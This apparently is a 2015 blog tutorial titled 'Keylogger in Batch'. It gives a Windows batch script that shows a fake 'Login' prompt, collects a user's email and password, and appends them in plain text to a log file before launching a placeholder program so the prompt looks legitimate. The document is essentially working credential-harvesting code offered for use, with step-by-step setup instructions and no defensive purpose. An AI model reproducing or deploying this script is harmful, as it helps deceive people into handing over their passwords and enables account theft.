pondelok 26. októbra 2015

Keylogger in Batch

    Hello, and welcome to another tutorial. This one will be little bit different, because today we will not use HTML, CSS, JavaScript or any other web design languages. This time we will use programming language called Batch


What will we need

  • Text editor supporting Batch (Notepad ++ is the best)
  • Computer running on Windows
Steps
  1. First think what we will do, is create a folder called Logs. In this folder we will save our program
  2. Second thing what we will do , we will open our text editor (also make sure it supports Batch).
  3. Third thing is to copy or rewrite the code below"
    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >> Log.txt
    start >>Program Here<<
    exit
  4. Save the file as Logger.bat into the folder Logs which you created earlier.
  5. Go to the folder Logs and open the file Logger
  6. Finished
I hope you enjoyed this tutorial and see you next time.